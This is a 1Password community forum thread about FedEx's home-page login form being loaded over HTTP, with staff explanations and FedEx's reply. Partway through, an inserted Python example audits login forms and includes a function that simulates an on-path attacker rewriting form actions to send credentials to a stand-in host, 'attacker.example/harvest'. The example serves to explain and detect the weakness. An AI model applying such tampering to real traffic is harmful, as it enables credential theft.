fedex.com login is not secure

ddokoto (Community Member)

This is not a specific issue with 1password.

I just discovered that the login pane on the home page of http://www.fedex.com is not using https, so it's not secure and your username and password will not be encrypted over the internet.

I tried to ask FedEx why they did that, but getting to the department at FedEx that knows is too hard. None of the agents I talked to have a clue. As usual, they suggested I use Internet Explorer, which on a Mac is not an option, besides the fact that this is not browser dependent. But it's on their boilerplate Q/A sheet to ask.

It appears that on some other pages that allow for login, they do use https.

Since you guys are in the business of security, do you understand why a company such as FedEx is so clueless about this?


1Password Version: 1Password 5 Version 5.3.1 (531001)
Extension Version: Not Provided
OS Version: 10.10.4
Sync Type: Not Provided

Comments

  • AGAlumB (1Password Alumni)

    It appears that on some other pages that allow for login, they do use https.
    Since you are guys are in the business of security, do you understand why a company such as fedex is so clueless about this?

    @ddokoto: Ouch. While it's impossible for any of us to say, my guess would be "inertia". Often large companies rely on legacy systems on the backend which simply don't integrate with anything from, well...the 21st century. It may be that they'd need to upgrade a large part of their infrastructure just to make what appears to be a minor change like this. Not that that makes it okay. :lol:

    That said, there's nothing stopping you from using one of the secure pages as your Login URL. And it also never hurts to simply try changing the http:// to https://, as it will often work. HTTPS Everywhere can also automate this in your browser. I hope this helps! :)

  • littlebobbytables (1Password Alumni)

    Hi @ddokoto,

    It looks like they may be making the classic mistake of posting over HTTPS from an insecure page. For others reading, Troy Hunt explains why this is a bad idea in his article "Your login form posts to HTTPS, but you blew it when you loaded it over HTTP".

    Here is something you can do to obtain a better URL from which to create a Login item, at least I think it should.

    1. Visit http://www.fedex.com/ and select your desired country if need be.
    2. Select your desired default option in the I want to menu below where it asks for your password.
    3. Click the Login button. Yes, without having filled in any details.
    4. You will be sent to a page where the URL starts with https://www.fedex.com/fcl/logon.do and then a number of parameters of which at least some are required to reach this page.
    5. Enter your username and password here and use our How to manually save a Login guide to create your Login item.
    6. You'll want to rely on what we call open and fill. In other words you want 1Password to pass that URL to your browser or store it in a bookmark, whichever suits you better and use that from now on.

    It isn't ideal, but given FedEx aren't loading the standard login page over HTTPS, it's at least an improvement for those, like yourself, who are security conscious. Hopefully going forward somebody realises their current approach is not a wise one. I've shut down at least one account upon discovering the use of HTTP for the login page, and I made a point of telling that company why too.
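To make the "posts to HTTPS from an HTTP page" problem concrete, here is an added example (not code from the original post, from 1Password, or from FedEx). It audits synthetic, constructed HTML documents that stand in for fetched pages: a password form only counts as protected when both the page that delivered the form and the form's action are https, because an http page can be rewritten by anyone on the network path before the browser ever sees the https action. The host names, paths and the tamper function are assumptions for illustration.

```python
"""Audit login forms for end-to-end HTTPS and show why an https action alone
is not enough when the page itself arrived over plain http.

Added example: the HTML below is constructed, not captured from any site.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _FormCollector(HTMLParser):
    """Collects every <form> on a page and notes whether it holds a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []        # each entry: {"action": str, "has_password": bool}
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)    # attribute values may be None for bare attributes
        if tag == "form":
            self._current = {"action": attrs.get("action") or "", "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (attrs.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def audit_login_forms(page_url, html):
    """Return one finding string per password form that is not protected end to end.

    The page scheme is checked first: if the document came over http, the action
    attribute is attacker-controllable, so an https action is not a mitigation.
    """
    parser = _FormCollector()
    parser.feed(html)
    page_scheme = urlsplit(page_url).scheme
    findings = []
    for form in parser.forms:
        if not form["has_password"]:
            continue
        action = urljoin(page_url, form["action"] or page_url)   # empty action = same page
        action_scheme = urlsplit(action).scheme
        if page_scheme != "https":
            findings.append(
                f"password form on {page_url} was loaded over {page_scheme}; "
                f"its action ({action}) can be rewritten by anyone on the path"
            )
        elif action_scheme != "https":
            findings.append(f"password form on {page_url} submits over {action_scheme} to {action}")
    return findings


def tamper_in_transit(html, attacker_host):
    """Simulate what an on-path attacker can do to an http page: rewrite every
    form action so credentials go to the attacker instead (hypothetical host)."""
    return re.sub(r'action="[^"]*"', f'action="http://{attacker_host}/harvest"', html)


# Constructed sample: an http home page whose login form posts to an https URL.
HTTP_PAGE_HTTPS_ACTION = """
<html><body>
<form action="https://www.example.com/fcl/logon.do" method="post">
  <input type="text" name="username">
  <input type="password" name="password">
  <input type="submit" value="Login">
</form>
</body></html>
"""

# Constructed sample: a dedicated https login page posting to a relative https URL.
SECURE_PAGE = """
<html><body>
<form action="/fcl/logon.do" method="post">
  <input type="text" name="username">
  <input type="password" name="password">
</form>
</body></html>
"""

if __name__ == "__main__":
    for url, doc in [("http://www.example.com/", HTTP_PAGE_HTTPS_ACTION),
                     ("https://www.example.com/fcl/logon.do", SECURE_PAGE),
                     ("http://www.example.com/", tamper_in_transit(HTTP_PAGE_HTTPS_ACTION, "attacker.example"))]:
        print(url, "->", audit_login_forms(url, doc) or ["ok"])
```

The third case is the point of the exercise: after the attacker rewrites the action, the page looks identical to the user and the "it posts to HTTPS" claim is simply no longer true, which is why the audit flags the http page before it even looks at the action.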

  • ddokoto (Community Member)

    That said, there's nothing stopping you from using one of the secure pages as your Login URL. And it also never hurts to simply try changing the http:// to https://, as it will often work.

    Been there, done that. This tip does not work on this page. It immediately reverts back to http. Going to the "empty login failure" page may be the only way, I thought. I tried to add that URL to 1Password before I posted my query, but my autologin attempt to that page failed. I haven't tried since.

    FedEx does not appear to have a web support contact number or email. All you can call is customer service, and of course the first question is "what is your tracking number?". I asked to be transferred to speak to an agent about an issue with the website, and that appeared to be too complicated a request for the first agent to handle. I wonder if there is a third-party site to discuss this issue in order to get (the giant) FedEx's attention. The direct method hit a brick wall. I sent email to abuse@fedex.com, but there's no response. My last attempt was to speaker@infosec.fedex.com, found in a forum posting. Again, no response (or bounce).

  • littlebobbytables (1Password Alumni)

    Hi @ddokoto,

    It might be worth trying to create a new Login item on that login failure page. I don't have an account to test with but I can get open and fill to open a new tab and everything looks good from the filling aspect - I think it should work.

    Some sites seem to be more responsive than others. It's a shame they don't seem interested in improving their site :(

  • ddokoto (Community Member)

    Here is the response from FedEx...

    On 8/25/15 7:54 AM, Kerre Cassidy wrote:

    Hi,

    Fedex.com home page is presented as http which can be confusing and aggravating to the security conscious user. However, the login form on this page does submit to an encrypted (HTTPS) page, so the credentials are securely transported in this login scenario. Additionally, https is presented explicitly when one clicks the login button from the fedex.com home page.

    FedEx takes both the customer experience and information security seriously and utilizes many tools, processes and techniques to protect customer and company data.

    Thank you for your message.

    Kerre Cassidy
    FedEx Information Security krcassidy@fedex.com

  • littlebobbytables (1Password Alumni)

    Greetings @ddokoto,

    Fedex.com home page is presented as http which can be confusing and aggravating to the security conscious user. However, the login form on this page does submit to an encrypted (HTTPS) page, so the credentials are securely transported in this login scenario. Additionally, https is presented explicitly when one clicks the login button from the fedex.com home page.

    Here's how "Your login form posts to HTTPS, but you blew it when you loaded it over HTTP" starts...

    User: “Hey mate, your website isn’t using SSL when I enter my password, what gives?!”

    Owner: “Ah, but it posts to HTTPS so your password is secure! We take security seriously. Our measures are robust.” (and other random, unquantifiable claims)

    They look scarily similar, don't they? I remain resolute in my beliefs: they should either serve the home page over HTTPS or have a dedicated login page. I will confess, I'm probably not being completely objective if I say I prefer the latter, as it means applications like ours are far more likely to have fewer issues filling if it's a simple, dedicated page. I also argue, though, that a simple dedicated page makes it easier for the developer too.

    Hopefully they one day see the light and understand that everybody has to be security conscious now, and that small changes by all the players can make it safer for everybody.
